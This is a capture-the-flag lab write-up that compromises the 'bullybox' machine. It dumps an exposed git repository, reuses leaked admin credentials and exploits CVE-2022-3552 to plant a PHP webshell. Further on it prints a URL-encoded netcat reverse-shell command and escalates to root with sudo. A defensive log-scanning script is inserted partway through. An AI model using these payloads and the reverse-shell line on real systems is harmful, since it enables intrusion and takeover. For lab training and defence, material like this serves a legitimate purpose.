Target IP: 192.168.250.27
Challenge Description: N/A.
There are two TCP ports open on the target machine: SSH and HTTP, as shown above.
Performing an aggressive port scan against the two TCP ports returns the result above. I will start enumeration with the web application on port 80. After rescanning the target machine, I managed to find out more information about the target machine: it has a git repository!
Port 80: HTTP
I tried to browse to http://192.168.250.27 on my machine. However, I was presented with the VHOST name bullybox.local. I added this VHOST name to my /etc/hosts file. Now my /etc/hosts contains the entry shown in the image above.
Now the webpage above is displayed after making the changes to my /etc/hosts file. I tried default credentials, but I had no luck.
Doing a source-code scan shows the application version is 4.22.1.5, as shown above.
I registered an account, but I did not find anything useful. I will need to obtain the admin account. Maybe the git repository contains sensitive data?
Browsing to http://bullybox.local/.git displays the webpage above. Apparently I do not have access to the resource. But from previous knowledge, I know it is possible to bypass this using tools such as git-dumper.
Using git-dumper, I dumped the contents of the git repository in a directory called dumped.
The tool successfully managed to dump 611 directories and 3497 files as shown above.
Checking the HEAD shows the important information above. The admin's name is Yuki and their email address is admin@bullybox.local as shown above.
The file bb-config.php contains the credentials of the user admin shown above. The credentials admin:Playing-Unstylish7-Provided is interesting. Also, in the image above, the /bb-admin sounds like the admin panel.
Browsing to http://bullybox.local/bb-admin displays the webpage above. At the bottom of the webpage, the version 4.22.1.5 of the application is also specified.
And bingo! Using the credentials admin:Playing-Unstylish7-Provided works! Now I have access to the web application as the admin user, as shown above. Now that I have the admin credentials and the verified application version, it is time to search for any vulnerabilities.
The application seems to be vulnerable to RCE, as shown above. The vulnerability has been assigned CVE-2022-3552.
I found the PoC above for this exploit. I tried this exploit against the target machine.
I made a POST request to /api/admin/Filemanager/save_file with the value order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f> and obtained the result true as shown above. It looks like the file was uploaded with the name ax.php at the current working directory.
Now browsing to ax.php works: the phpinfo page is displayed, as shown above. Time to upload a webshell.
I uploaded the URL-encoded PHP webshell <%3fphp+echo+system($_GET['cmd'])%3b%3f>. I named this file shell.php. It was uploaded successfully, as shown above.
And I can access my PHP webshell at http://bullybox.local/shell.php. I issued the commands id;whoami;ls and received the output above. The commands were executed successfully. Time to obtain a reverse shell connection now.
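From the defender's side, the whole chain so far leaves a clear trail in the web server's access log: file-by-file reads under /.git (directory listing denied, objects still served), a POST to the file-manager save endpoint, and then GET requests to a new top-level .php file carrying a cmd parameter. The following added example (not part of the original writeup) scans constructed common-log-format lines for those three patterns; the IP, endpoint and file names are taken from this writeup, the timestamps and sizes are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not taken from a real server.
SAMPLE_LOG = """\
192.168.45.176 - - [10/Jan/2024:10:00:01 +0000] "GET /.git/ HTTP/1.1" 403 199
192.168.45.176 - - [10/Jan/2024:10:00:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23
192.168.45.176 - - [10/Jan/2024:10:00:03 +0000] "GET /.git/objects/ab/cd1234 HTTP/1.1" 200 512
192.168.45.176 - - [10/Jan/2024:10:05:10 +0000] "POST /api/admin/Filemanager/save_file HTTP/1.1" 200 4
192.168.45.176 - - [10/Jan/2024:10:05:12 +0000] "GET /ax.php HTTP/1.1" 200 80000
192.168.45.176 - - [10/Jan/2024:10:06:00 +0000] "GET /shell.php?cmd=id%3Bwhoami HTTP/1.1" 200 120
10.0.0.5 - - [10/Jan/2024:10:07:00 +0000] "GET /index.php HTTP/1.1" 200 5000
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(method, url, status):
    """Return a finding label for one request, or None if it looks benign."""
    parts = urlsplit(url)
    path, query = parts.path, parse_qs(parts.query)
    # Any hit under /.git is suspicious: a 403 on the index does not stop
    # git-dumper-style tools from fetching HEAD, refs and objects one by one.
    if path.startswith("/.git"):
        return "git-metadata-access" + (" (served)" if status == "200" else " (denied)")
    # The file-manager save endpoint used in the CVE-2022-3552 PoC writes arbitrary files.
    if method == "POST" and path == "/api/admin/Filemanager/save_file":
        return "filemanager-write"
    # A .php file taking a 'cmd' query parameter is the classic webshell signature.
    if path.endswith(".php") and "cmd" in query:
        return "webshell-command"
    return None

def scan_access_log(text):
    """Parse log lines and return (ip, label, url) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line; skip rather than crash
        label = classify(m["method"], m["url"], m["status"])
        if label:
            findings.append((m["ip"], label, m["url"]))
    return findings

if __name__ == "__main__":
    for ip, label, url in scan_access_log(SAMPLE_LOG):
        print(f"{ip:16} {label:30} {url}")
```

Note that the plain GET of ax.php is not flagged on its own; it is the preceding save_file POST and the later cmd parameter that make the sequence stand out, so correlating by source IP is what turns these into one incident.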
I started a listener on my machine at port 80. Then using the PHP webshell, I deployed the URL-encoded nc reverse shell code rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.176%2080%20%3E%2Ftmp%2Ff. And now I have a reverse shell connection on my machine at port 80 with the session as the user yuki as shown above. Now I have a foothold on the target machine.
I tried to find the local.txt flag, but there was none. Running sudo -l shows that all commands can be executed as root. To spawn a root shell, I entered the command sudo bash. It seems like this machine only has a proof.txt flag, and this flag is shown above. I was able to read it after spawning a root shell.